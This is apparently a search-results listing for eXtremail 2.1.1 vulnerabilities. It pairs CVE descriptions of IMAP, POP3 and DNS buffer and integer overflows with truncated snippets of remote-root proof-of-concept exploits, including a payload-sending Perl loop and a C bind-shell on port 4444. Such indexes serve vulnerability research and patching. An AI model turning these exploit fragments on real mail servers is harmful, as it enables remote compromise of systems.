8 matches found
eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC
No description provided by source. / extremail-v9.c Copyright c 2007 by [email protected] eXtremail 2.1.1 remote root POC x86-lnx by mu-b - Tue Feb 6 2007 - Tested on: eXtremail 2.1.0 lnx eXtremail 2.1.1 lnx POC for DNS parsing bugs... This program is free software; you can redistribute it and/...
Buffer overflow
Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to 1 have an unknown impact by sending multiple long strings to the IMAP port 143/tcp; 2 execute arbitrary code via a long string in an IMAP AUTHENTICATE PLAIN action, involving the ifParseAuthPlain function; 3 execut...
Integer overflow
Integer overflow in eXtremail 2.1.1 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long USER command containing "%s" sequences to the pop3 port 110/tcp, which are expanded to "%%s" before being used in the memmove function, possibly du...
CVE-2007-5466
Multiple buffer overflows in eXtremail 2.1.1 and earlier allow remote attackers to 1 have an unknown impact by sending multiple long strings to the IMAP port 143/tcp; 2 execute arbitrary code via a long string in an IMAP AUTHENTICATE PLAIN action, involving the ifParseAuthPlain function; 3 execut...
ex211heap-overflow.txt
!/usr/bin/perl extremail-v8.pl Copyright c 2007 by eXtremail Connected\n"; sleep16; print"- Sending payload\n"; $buf = "\x00".$NOP x 0x2710-1; sendSOCKET, $buf, 0; sleep$senddelay; $buf = $NOP x 0x2710; while $loop-- print"- Sending payload ".$loop."\n"; sendSOCKET, $buf, 0; sleep$senddelay;...
eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
/ extremail-v4.c Copyright c 2006 by eXtremail include include include include include define BUFSIZE 8192 define NOP 0x41 define PAD 0 / do you feel lucky? / define DEFPORT 4501 define PORTADMIN DEFPORT define PORTSHELL 4444 static const char bndshelllnx =...
eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)
eXtremail 2.1.1 - DNS Parsing Bugs Remote PoC / extremail-v9.c Copyright c 2007 by eXtremail include include include include include define DNSHDRLEN 12 define DNSTRAILLEN 20 define DNSPORT 53 define DNSMAXMSG 0x200 define HAMMERLEN 284 static char dnshdrbuf = "\x69\x69" / transaction id /...
eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)
/ extremail-v9.c Copyright c 2007 by eXtremail include include include include include define DNSHDRLEN 12 define DNSTRAILLEN 20 define DNSPORT 53 define DNSMAXMSG 0x200 define HAMMERLEN 284 static char dnshdrbuf = "\x69\x69" / transaction id / "\x81\x80" / flags / "\x00\x01" / questions /...